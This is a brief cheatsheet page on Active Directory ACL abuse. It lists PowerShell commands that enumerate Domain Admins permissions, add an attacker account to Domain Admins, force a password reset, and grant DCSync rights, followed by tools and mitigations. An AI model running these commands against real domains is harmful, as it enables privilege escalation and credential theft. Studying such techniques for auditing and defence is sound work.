Back to Active Directory

Ace Acl

Active Directory cheatsheet — Active Directory enumeration and attack techniques.

Overview

ACE/ACL attacks target Active Directory access control entries and lists. Common abuse targets include GenericAll, GenericWrite, WriteOwner, WriteDACL, ForceChangePassword, and AllExtendedRights on AD objects.

These permissions can allow attackers to modify AD objects, reset passwords, add group memberships, or perform DCSync-style attacks.

Category: Active Directory — Active Directory enumeration and attack techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Ace Acl:

Get-ObjectAcl -Identity "Domain Admins" | ? {$_.ActiveDirectoryRights -match "GenericAll|Write|Create"}
Get-ObjectAcl -Identity "Domain Admins" -ResolveGUIDs
Add-ADGroupMember -Identity "Domain Admins" -Members attackeruser
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString "NewPass123!" -AsPlainText -Force)
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity attacker -Rights DCSync

Tools & Techniques

Recommended tools for Ace Acl:

  • PowerView: Get-ObjectAcl for ACL enumeration
  • BloodHound: visual attack path identification
  • ADACLScanner: automated ACL auditing
  • Add-DomainGroupMember: abuse GenericWrite/GenericAll
  • Set-DomainUserPassword: abuse ForceChangePassword

Prevention & Mitigation

Security recommendations to prevent Ace Acl:

  • Regularly audit AD ACLs and remove excessive permissions
  • Apply the principle of least privilege for delegated controls
  • Use groups for permission assignment instead of individual users
  • Protect Tier 0 objects (Domain Admins, Enterprise Admins) with strict ACLs
  • Monitor for ACL modification events (Event ID 5136)

References

Additional resources: